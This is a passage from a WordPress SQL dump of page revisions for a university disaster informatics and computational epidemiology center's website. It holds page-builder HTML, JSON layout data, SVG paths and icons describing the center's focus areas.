opacity=\"0.6\"></path>\n        <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-677 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-677-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-678-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"https://gsudice.dataconn.net/about/our-mission/\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-678 style-local-22-h30 position-relative\"><!----><!----> <span>our mission</span></a>\n                    </span>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h31\" class=\"h-x-container style-217 style-local-22-h31 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h31-group style-217-spacing style-local-22-h31-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h32-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\"  data-colibri-id=\"22-h32\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h32 position-relative\"><!----><!----> <span>Learn More</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h33-outer\">\n            <div data-colibri-id=\"22-h33\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h33 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h34\" class=\"d-block style-221 style-local-22-h34 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h34-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h34-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-04-29 09:17:36','2022-04-29 13:17:36','',22,'https://gsudice.dataconn.net/?p=1297',0,'revision','',0),(1301,1,'2022-04-29 09:59:22','2022-04-29 13:59:22','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c5\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c7\",\"parentId\":\"20-c6\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c7\",\"index\":0,\"id\":\"20-c8\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c6\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c10\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c10\",\"index\":0,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c12\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c14\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c14\",\"index\":0,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c16\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c17\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c18\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c18\",\"index\":0,\"id\":\"20-c19\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c20\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c21\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c9\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-04-29 09:59:22','2022-04-29 13:59:22','',168,'https://gsudice.dataconn.net/?p=1301',0,'revision','',0),(1302,1,'2022-04-29 09:59:22','2022-04-29 13:59:22','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c5-outer\">\n            <div data-colibri-id=\"20-c5\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c5 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c6 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c7-outer\">\n            <div data-colibri-id=\"20-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c7 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c8\" class=\"h-global-transition-all h-heading style-334 style-local-20-c8 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-334 style-local-20-c8\">\n                    <!---->\n                    <!---->\n                    <h1 class=\"\">Focus Areas</h1>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c9\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c10-outer\">\n            <div data-colibri-id=\"20-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c11\" class=\"h-icon style-274 style-local-20-c11 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c11-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c12\" class=\"h-global-transition-all h-heading style-275 style-local-20-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c13\" class=\"h-text h-text-component style-276 style-local-20-c13 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c14-outer\">\n          <div data-colibri-id=\"20-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c14 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c15\" class=\"h-icon style-274 style-local-20-c15 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c15-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 